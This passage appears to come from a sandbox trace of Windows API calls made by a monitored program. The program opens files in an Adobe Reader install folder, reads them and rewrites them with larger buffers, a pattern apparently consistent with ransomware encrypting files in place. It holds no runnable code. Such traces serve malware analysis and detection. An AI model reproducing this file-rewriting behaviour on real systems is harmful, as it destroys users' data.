lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0088.974] CloseHandle (hObject=0x1fc) returned 1 [0088.990] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\Services.cfg" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\services.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0088.991] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0088.991] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7f79 [0088.991] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0088.991] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.991] ReleaseMutex (hMutex=0x168) returned 1 [0088.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.cfg", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.cfg", cchWideChar=12, lpMultiByteStr=0x1f735ec, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.cfg", lpUsedDefaultChar=0x0) returned 12 [0088.992] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0089.183] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6f79 [0089.184] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0089.243] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6f79 [0090.189] WriteFile (in: hFile=0x1fc, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0090.190] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0090.190] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0090.190] CloseHandle (hObject=0x1fc) returned 1 [0090.191] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\email_initiator.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\email_initiator.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0090.191] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0090.191] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x550 [0090.191] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0090.192] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.192] ReleaseMutex (hMutex=0x168) returned 1 [0090.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="email_initiator.gif", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0090.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="email_initiator.gif", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="email_initiator.gif", lpUsedDefaultChar=0x0) returned 19 [0090.192] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f3d8e8, nNumberOfBytesToRead=0x550, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3d8e8*, lpNumberOfBytesRead=0x2d5f2bc*=0x550, lpOverlapped=0x0) returned 1 [0090.616] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0090.616] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0xad8, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2d5f2d0*=0xad8, lpOverlapped=0x0) returned 1 [0090.617] CloseHandle (hObject=0x1fc) returned 1 [0090.617] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\main.css" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\main.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0090.617] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0090.617] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2e9a [0090.617] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0090.617] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.617] ReleaseMutex (hMutex=0x168) returned 1 [0090.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.css", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0090.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.css", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="main.css", lpUsedDefaultChar=0x0) returned 8 [0090.618] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.745] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1e9a [0090.746] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.862] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1e9a [0090.862] WriteFile (in: hFile=0x1fc, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0090.863] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0090.863] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0090.863] CloseHandle (hObject=0x1fc) returned 1 [0090.863] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_email.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_email.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0090.864] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0090.864] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x57d [0090.864] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0090.864] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.864] ReleaseMutex (hMutex=0x168) returned 1 [0090.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="review_email.gif", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="review_email.gif", cchWideChar=16, lpMultiByteStr=0x1f88a64, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="review_email.gif", lpUsedDefaultChar=0x0) returned 16 [0090.864] ReadFile (in: hFile=0x1fc, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x57d, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2d5f2bc*=0x57d, lpOverlapped=0x0) returned 1 [0092.282] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0092.282] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0xb05, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2d5f2d0*=0xb05, lpOverlapped=0x0) returned 1 [0092.282] CloseHandle (hObject=0x1fc) returned 1 [0092.282] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\submission_history.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\submission_history.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0092.283] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0092.283] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x38a [0092.283] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0092.283] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.283] ReleaseMutex (hMutex=0x168) returned 1 [0092.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="submission_history.gif", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0092.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="submission_history.gif", cchWideChar=22, lpMultiByteStr=0x1f88ba4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="submission_history.gif", lpUsedDefaultChar=0x0) returned 22 [0092.283] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f4a978, nNumberOfBytesToRead=0x38a, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4a978*, lpNumberOfBytesRead=0x2d5f2bc*=0x38a, lpOverlapped=0x0) returned 1 [0092.376] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0092.377] WriteFile (in: hFile=0x1fc, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x912, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x912, lpOverlapped=0x0) returned 1 [0092.377] CloseHandle (hObject=0x1fc) returned 1 [0092.377] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\warning.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\warning.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0092.388] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0092.388] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x171 [0092.388] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0092.389] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.389] ReleaseMutex (hMutex=0x168) returned 1 [0092.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="warning.gif", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="warning.gif", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="warning.gif", lpUsedDefaultChar=0x0) returned 11 [0092.389] ReadFile (in: hFile=0x1fc, lpBuffer=0x26a78e8, nNumberOfBytesToRead=0x171, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a78e8*, lpNumberOfBytesRead=0x2d5f2bc*=0x171, lpOverlapped=0x0) returned 1 [0092.390] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0092.390] WriteFile (in: hFile=0x1fc, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x6f9, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2d5f2d0*=0x6f9, lpOverlapped=0x0) returned 1 [0092.390] CloseHandle (hObject=0x1fc) returned 1 [0092.390] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmej.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0092.391] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0092.391] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x17b8 [0092.391] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0092.391] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.391] ReleaseMutex (hMutex=0x168) returned 1 [0092.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeJ.htm", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeJ.htm", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadMeJ.htm", lpUsedDefaultChar=0x0) returned 11 [0092.391] ReadFile (in: hFile=0x1fc, lpBuffer=0x2667c68, nNumberOfBytesToRead=0x17b8, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesRead=0x2d5f2bc*=0x17b8, lpOverlapped=0x0) returned 1 [0092.497] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0092.498] WriteFile (in: hFile=0x1fc, lpBuffer=0x288ce18*, nNumberOfBytesToWrite=0x1d40, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288ce18*, lpNumberOfBytesWritten=0x2d5f2d0*=0x1d40, lpOverlapped=0x0) returned 1 [0092.498] CloseHandle (hObject=0x1fc) returned 1 [0092.498] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeGothicStd-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobegothicstd-bold.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0092.499] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0092.499] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2c0638 [0092.499] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0092.499] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.499] ReleaseMutex (hMutex=0x168) returned 1 [0092.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeGothicStd-Bold.otf", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0092.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeGothicStd-Bold.otf", cchWideChar=23, lpMultiByteStr=0x1f8867c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeGothicStd-Bold.otf", lpUsedDefaultChar=0x0) returned 23 [0092.500] ReadFile (in: hFile=0x1fc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0092.515] ReadFile (in: hFile=0x1fc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0092.524] ReadFile (in: hFile=0x1fc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0x2000, lpOverlapped=0x0) returned 1 [0092.540] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2be638 [0092.540] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea88b8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea88b8*, lpNumberOfBytesRead=0x2d5f278*=0x2000, lpOverlapped=0x0) returned 1 [0092.551] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2be638 [0092.552] WriteFile (in: hFile=0x1fc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2d5f28c*=0x2588, lpOverlapped=0x0) returned 1 [0092.552] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0092.552] WriteFile (in: hFile=0x1fc, lpBuffer=0x28cb978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x28cb978*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0092.553] WriteFile (in: hFile=0x1fc, lpBuffer=0x28cb978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x28cb978*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0092.553] WriteFile (in: hFile=0x1fc, lpBuffer=0x28cb978*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x28cb978*, lpNumberOfBytesWritten=0x2d5f28c*=0x2000, lpOverlapped=0x0) returned 1 [0092.553] CloseHandle (hObject=0x1fc) returned 1 [0092.554] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90ms-rksj-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.554] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-H", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-H", lpFilePart=0x2d5f690*="90ms-RKSJ-H") returned 0x42 [0092.554] GetLastError () returned 0x5 [0092.554] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.554] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.554] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.554] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.555] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.556] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.556] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90ms-rksj-h")) returned 0x20 [0092.556] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Add-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\add-rksj-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.556] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Add-RKSJ-H", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files 